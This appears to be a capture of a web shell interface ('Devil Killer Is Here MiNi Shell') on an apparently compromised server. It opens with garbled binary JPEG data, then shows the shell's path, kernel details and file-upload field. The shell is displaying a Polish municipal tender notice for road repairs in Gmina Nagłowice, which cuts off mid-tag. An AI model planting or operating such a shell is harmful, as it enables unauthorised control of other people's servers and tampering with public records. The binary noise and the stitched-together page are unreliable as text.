JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211013/0023117401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> " PRZEBUDOWY DRÓG NA TERENIE GMINY NAGŁOWICE <br/> W RAMACH USUWANIA SKUTKÓW KLĘSK ŻYWIOŁOWYCH" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Nagłowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291010398</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mikołaja Reja 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nagłowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-362</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41- 381 45-23</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">41-3814567</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@naglowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.naglowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> " PRZEBUDOWY DRÓG NA TERENIE GMINY NAGŁOWICE <br/> W RAMACH USUWANIA SKUTKÓW KLĘSK ŻYWIOŁOWYCH" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a87b311e-2b4b-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00231174</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009853/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Przebudowa dróg na terenie Gminy Nagłowice w ramach usuwania skutków klęsk żywiołowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://naglowice.ezamawiający.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://naglowice.ezamawiający.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu ofertę oraz oświadczenia i dokumenty, o których mowa w SWZ, składa się - pod rygorem nieważności, w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym osoby bądź osób umocowanych do reprezentacji wykonawcy) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby bądź osób umocowanych do reprezentacji wykonawcy - za pośrednictwem Platformy znajdującej się pod adresem: https://naglowice.ezamawiajacy.pl<br/>3. Podmiotowe środki dowodowe oraz inne ewentualne dokumenty i oświadczenia o których mowa w SWZ w szczególności w rozdz. VIII.1. i VIII.2 składa się - w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym osoby bądź osób umocowanych do reprezentacji wykonawcy) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby bądź osób umocowanych do reprezentacji wykonawcy – za pośrednictwem Platformy znajdującej się pod adresem: https://naglowice.ezamawiajacy.pl w zakładce „Korespondencja” lub na adres e-mail: gmina@naglowice.pl<br/>4. Podmiotowe środki dowodowe oraz inne ewentualne dokumenty i oświadczenia o których mowa w SWZ ,które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu dokumentów przekazywanym na adresy e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adresy e-mail Zamawiającego. W przypadku skorzystania z Platformy za datę wpływu dokumentów przyjmuje się datę ich złożenia/wysłania na Platformie. Zamawiający określa dopuszczalny format kwalifikowanego podpisu elektronicznego, jako:<br/>1) dokumenty w formacie „pdf" zaleca się podpisywać formatem PAdES,<br/>2) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf", wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.11. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">14. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>Administratorem Pani/Pana danych osobowych jest Gmina Nagłowice ul. Mikołaja Reja 9,28-362 Nagłowice reprezentowana przez Wójta Gminy , tel. 041 38 145-67 fax. 041 145-67 , email: gmina@naglowice.pl<br/>b) Inspektorem ochrony danych osobowych w Gminie Nagłowice, ul. Mikołaja Reja 9, 28-362 Nagłowicejest Pan Sylwester Cieśla ul. Kościuszki 11/110, 25-310 Kielce, który jest dostępny pod adresem e-mail: mail: iod@czi24.pl<br/>c). Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn:<br/>" PRZEBUDOWY DRÓG NA TERENIE GMINY NAGŁOWICE<br/> W RAMACH USUWANIA SKUTKÓW KLĘSK ŻYWIOŁOWYCH" <br/><br/>d). odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późn. zm.); <br/>e). Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata – przez okres wymagany przepisami prawa.;<br/>f). obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy pzp, związanym <br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy pzp; <br/>g). w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h). posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>(Uwaga: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą pzp oraz nie może naruszać integralności protokołu oraz jego załączników)<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>(Uwaga: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego)<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>i). nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.12.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 419538,09 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część1) Przebudowa drogi wewnętrznej w miejscowości Deszno w km 0+000 do km 0+300 na dz. nr 52 oraz w km 0 +000 do km 0+ 050 na dz. nr 171<br/>Zakres robót obejmuje m.in.:<br/>• Wykonanie robót ziemnych związanych odtworzeniem warstw konstrukcyjnych,<br/>• Uzupełnienie ubytków podbudowy w-wą kruszywa stabilizowanego mechanicznie <br/>• Wykonanie wyrównanie istniejącej podbudowy z kruszywa łamanego gr. 15cm, • Wykonanie w-wy bitumicznej wyrównawczej w ilości 1 00kg/m2.<br/>• Wykonanie w-wy bitumicznej ścieralnej grubości 4cm.<br/>• Wykonanie zabezpieczenia krawędzi nawierzchni bitumicznej kruszywem łamanym.<br/>Podstawowe dane przedmiotowej inwestycji:<br/>Długość przebudowywanej drogi - 350 mb,<br/>Szerokość jezdni:- 3,0-4,0 m<br/>Szerokość pobocza:- 0,5 m ulepszone z kruszywa, </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 162576,39 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) cena brutto za wykonanie przedmiotu zamówienia – waga - 60% <br/>b) okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości na wykonane roboty budowlane (w miesiącach) – waga - 40% <br/>2. Sposób wyliczenia punktów oferty: <br/>a) dla kryterium „cena brutto za wykonanie przedmiotu zamówienia” - według formuły: <br/>C=Cn/Cb x 60% 1%=1 punkt <br/>gdzie: <br/>C – ilość punktów oferty rozpatrywanej <br/>Cn – cena najniższej oferty wśród ofert nieodrzuconych <br/>Cb – cena oferty rozpatrywanej <br/>Oferta z najniższą ceną otrzyma 60 punktów. Liczba punktów pozostałych ofert zostanie obliczona według powyższego wzoru. Liczba uzyskanych punktów dla danej oferty będzie podawana do dwóch miejsc po przecinku. <br/>b) dla kryterium „okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości” - według formuły: <br/>G=[(Gn-Gmin)/(Gmax-Gmin)] x 40% 1%=1 punkt <br/>gdzie: <br/>G– ilość punktów oferty rozpatrywanej <br/>Gn – liczba miesięcy udzielonej rękojmi za wady i gwarancji jakości w ofercie rozpatrywanej <br/>Gmin – minimalny okres rękojmi za wady i gwarancji jakości wynoszący 36 miesięcy <br/>Gmax – maksymalny okres rękojmi za wady i gwarancji jakości wynoszący 60 miesięcy<br/>Oferta, w której wykonawca zaoferował 60 miesięcy lub dłuższy okres rękojmi za wady i gwarancji jakości otrzyma 40 punktów. Liczba punktów pozostałych ofert zostanie obliczona według powyższego wzoru. <br/>Uwaga: <br/>Zamawiający informuje iż: <br/>- minimalny okres rękojmi za wady i gwarancji jakości wynosi – 36 miesięcy <br/>- maksymalny okres rękojmi za wady i gwarancji jakości wynosi - 60 miesięcy <br/>Jeżeli wykonawca nie poda (nie wpisze) w ofercie okresu rękojmi za wady i gwarancji jakości, Zamawiający przyjmie do oceny ofert okres minimalny tj. 36 miesięcy. <br/>Liczba uzyskanych punktów dla danej oferty będzie podawana do dwóch miejsc po przecinku <br/>c) Ostateczna ilość punktów oferty: <br/>P= C+G <br/>P- ostateczna ilość punktów oferty badanej <br/>C- ilość punktów oferty badanej dla kryterium „cena” <br/>G- ilość punktów oferty badanej dla kryterium „okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości na wykonane roboty budowlane (w miesiącach)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2) Przebudowa drogi wewnętrznej w miejscowości Nagłowice <br/> w km 0+000 do km 0 +335 dz. nr 1503,1477/1,940/9,940/10<br/>Zakres robót obejmuje m.in.<br/> Długość przebudowywanej drogi - 335 mb,<br/> Szerokość jezdni:- 3,00m<br/> - Ścinanie poboczy mechanicznie grubości do 10 cm, ścięcie poboczy gruntowych na szerokości 1m<br/> - Wyrównanie istniejącej podbudowy tłuczniem sortowanym, zagęszczenie mechaniczne, <br/> średnia grubość warstwy po zagęszczeniu do 10 cm.<br/> - Wykonanie podbudowa z kruszywa stabilizowanego mechanicznie warstwa górna, <br/> grubość po zagęszczeniu 8cm<br/> - Wyrównanie istniejącej podbudowy mieszanką mineralno- bitumiczną, warstwa <br/> wyrównawcza w ilości 75kg/m2<br/> - Skropienie nawierzchni emulsją drogową szybkorozpadową<br/> - Wykonanie nawierzchnia z mieszanek mineralno- bitumicznych grysowych, asfaltowe, <br/> warstwa ścieralna o grubości 4 cm<br/>- Podbudowy z kruszyw, grubość warstwy po zagęszczeniu 8 cm- pobocza szerokości 0,25m </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 112761,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteriami wyboru oferty najkorzystniejszej będą: <br/>a) cena brutto za wykonanie przedmiotu zamówienia – waga - 60% <br/>b) okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości na wykonane roboty budowlane (w miesiącach) – waga - 40% <br/>2. Sposób wyliczenia punktów oferty: <br/>a) dla kryterium „cena brutto za wykonanie przedmiotu zamówienia” - według formuły: <br/>C=Cn/Cb x 60% 1%=1 punkt <br/>gdzie: <br/>C – ilość punktów oferty rozpatrywanej <br/>Cn – cena najniższej oferty wśród ofert nieodrzuconych <br/>Cb – cena oferty rozpatrywanej <br/>Oferta z najniższą ceną otrzyma 60 punktów. Liczba punktów pozostałych ofert zostanie obliczona według powyższego wzoru. Liczba uzyskanych punktów dla danej oferty będzie podawana do dwóch miejsc po przecinku. <br/>b) dla kryterium „okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości” - według formuły: <br/>G=[(Gn-Gmin)/(Gmax-Gmin)] x 40% 1%=1 punkt <br/>gdzie: <br/>G– ilość punktów oferty rozpatrywanej <br/>Gn – liczba miesięcy udzielonej rękojmi za wady i gwarancji jakości w ofercie rozpatrywanej <br/>Gmin – minimalny okres rękojmi za wady i gwarancji jakości wynoszący 36 miesięcy <br/>Gmax – maksymalny okres rękojmi za wady i gwarancji jakości wynoszący 60 miesięcy<br/>Oferta, w której wykonawca zaoferował 60 miesięcy lub dłuższy okres rękojmi za wady i gwarancji jakości otrzyma 40 punktów. Liczba punktów pozostałych ofert zostanie obliczona według powyższego wzoru. <br/>Uwaga: <br/>Zamawiający informuje iż: <br/>- minimalny okres rękojmi za wady i gwarancji jakości wynosi – 36 miesięcy <br/>- maksymalny okres rękojmi za wady i gwarancji jakości wynosi - 60 miesięcy <br/>Jeżeli wykonawca nie poda (nie wpisze) w ofercie okresu rękojmi za wady i gwarancji jakości, Zamawiający przyjmie do oceny ofert okres minimalny tj. 36 miesięcy. <br/>Liczba uzyskanych punktów dla danej oferty będzie podawana do dwóch miejsc po przecinku <br/>c) Ostateczna ilość punktów oferty: <br/>P= C+G <br/>P- ostateczna ilość punktów oferty badanej <br/>C- ilość punktów oferty badanej dla kryterium „cena” <br/>G- ilość punktów oferty badanej dla kryterium „okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej przez Wykonawcę rękojmi za wady i gwarancji jakości na wykonane roboty budowlane (w miesiącach</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 